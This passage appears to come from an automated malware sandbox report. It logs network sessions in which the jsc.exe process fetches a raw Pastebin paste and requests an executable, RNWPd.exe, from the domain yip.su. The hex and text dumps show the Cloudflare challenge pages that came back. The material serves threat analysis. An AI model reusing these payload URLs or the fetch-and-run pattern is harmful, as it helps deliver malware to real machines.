                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:26 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:26 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:26 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:26 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:26 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:26 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 31 31 31 38 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 30 66 31 38 32 65 38 63 30 39 27 2c 63 48 61 73 68 3a 20 27 63 37 33 65 66 31 62 64 30 30 63 35 36 61 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 41 4a 72 78 50 43 58 43 71 56 32 55 4c 75 30 52 6c 67 50 49 41 74 6c 45 66 6f 73 4a 67 34 55 77 6a 4d 7a 59 4f 6b 6a 54 76 79 38 2d 31 37 32 33 39 33 32 35 36 36 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '71118',cRay: '8b4cfd0f182e8c09',cHash: 'c73ef1bd00c56a2',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=AJrxPCXCqV2ULu0RlgPIAtlEfosJg4UwjMzYOkjTvy8-1723932566-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:26 UTC1369INData Raw: 36 74 57 32 55 4a 4f 33 65 4a 63 4d 61 48 35 66 62 57 62 47 30 79 58 6e 6a 32 5a 42 57 73 46 30 43 4a 41 6c 2e 2e 32 51 48 64 52 67 79 37 46 75 4d 4c 5f 37 41 5f 65 33 52 6b 39 41 54 69 73 72 4e 68 5f 61 42 4a 62 66 74 6f 4c 70 51 50 76 45 53 4a 32 31 6d 49 79 4c 46 30 51 6c 55 36 43 35 43 4b 6c 77 45 34 74 39 76 31 67 61 2e 62 6b 54 7a 76 6a 50 74 73 4f 76 49 58 49 36 64 36 36 33 70 56 4b 70 50 56 4b 78 70 66 78 58 4c 6f 31 30 4d 64 46 43 33 61 78 6c 57 46 70 71 6c 58 39 4a 50 33 50 64 67 67 59 5a 55 4a 36 4a 31 51 79 46 52 33 30 66 4d 61 56 5f 6c 6b 48 4a 61 70 6b 74 4e 7a 57 4b 47 4f 2e 6a 74 4a 52 54 76 74 65 75 6c 6c 41 7a 36 78 67 32 67 30 75 4d 63 67 41 49 51 43 4c 72 67 61 6e 69 6f 63 63 32 42 6e 75 7a 46 38 59 44 6f 57 6c 66 4b 35 79 47 30 49 54
                                    Data Ascii: 6tW2UJO3eJcMaH5fbWbG0yXnj2ZBWsF0CJAl..2QHdRgy7FuML_7A_e3Rk9ATisrNh_aBJbftoLpQPvESJ21mIyLF0QlU6C5CKlwE4t9v1ga.bkTzvjPtsOvIXI6d663pVKpPVKxpfxXLo10MdFC3axlWFpqlX9JP3PdggYZUJ6J1QyFR30fMaV_lkHJapktNzWKGO.jtJRTvteullAz6xg2g0uMcgAIQCLrganiocc2BnuzF8YDoWlfK5yG0IT


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.549754104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:31 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:32 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfd2ee8ad0cbc-EWR
                                    2024-08-17 22:09:32 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:32 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:32 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:32 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.549755188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:32 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:32 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:32 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 32 79 61 55 43 75 6b 69 44 36 52 66 32 56 54 65 41 4d 65 33 4c 70 4d 77 4d 53 4f 58 44 31 35 58 42 4f 45 67 75 35 46 58 46 65 33 4e 73 35 49 6f 33 49 50 67 49 4d 6e 42 37 66 42 46 42 31 2b 2f 51 30 53 59 4b 4f 50 6e 30 49 78 6b 72 6e 76 52 58 67 35 67 61 37 63 5a 65 50 30 58 54 76 65 4f 53 2b 47 45 4d 6b 4d 36 4a 35 51 3d 24 5a 73 68 75 64 77 38 6e 7a 6b 63 4c 41 4d 73 50 61 68 79 35 5a 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 2yaUCukiD6Rf2VTeAMe3LpMwMSOXD15XBOEgu5FXFe3Ns5Io3IPgIMnB7fBFB1+/Q0SYKOPn0IxkrnvRXg5ga7cZeP0XTveOS+GEMkM6J5Q=$Zshudw8nzkcLAMsPahy5ZQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:32 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:32 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:32 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:32 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
